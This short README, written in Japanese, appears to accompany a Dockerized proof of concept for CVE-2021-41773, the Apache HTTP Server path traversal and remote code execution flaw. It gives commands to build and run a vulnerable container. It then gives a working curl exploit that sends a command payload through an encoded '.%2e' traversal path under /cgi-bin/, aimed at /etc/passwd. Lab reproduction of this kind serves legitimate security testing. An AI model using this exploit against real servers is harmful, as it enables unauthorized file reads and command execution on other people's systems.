
Docker化されたApache HTTP ServerのパストラバーサルおよびRCE(CVE-2021-41773)の概念実証で、ビルド手順とcurlベースの悪用手順を含みます。
$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
httpd.conf ファイルの設定ミスとパストラバーサルの組み合わせによる RCE
